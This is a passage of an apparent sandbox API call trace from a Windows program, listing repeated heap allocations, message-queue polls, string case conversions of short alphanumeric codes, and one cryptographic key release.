Size=0x8) returned 0x24b2bb8 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0166.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.256] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.256] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0166.256] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.256] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0166.256] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.256] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.256] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0166.256] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.257] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0166.257] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.257] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.257] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.257] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0166.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.257] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.257] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.258] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.258] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.258] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.258] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.258] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.259] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.259] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.259] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0166.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.260] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0166.261] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0166.261] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0166.261] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.261] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0166.261] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.261] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.262] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.262] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.262] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.262] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0166.262] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.263] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0166.263] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.263] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.263] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0166.263] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.264] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0166.264] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.264] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.264] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0166.264] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0166.264] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0166.264] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.265] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0166.265] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.265] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0166.265] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.265] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.265] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.265] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0166.266] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.266] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.266] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.266] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.266] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.267] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0166.267] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0166.267] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0166.267] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0166.267] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.267] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 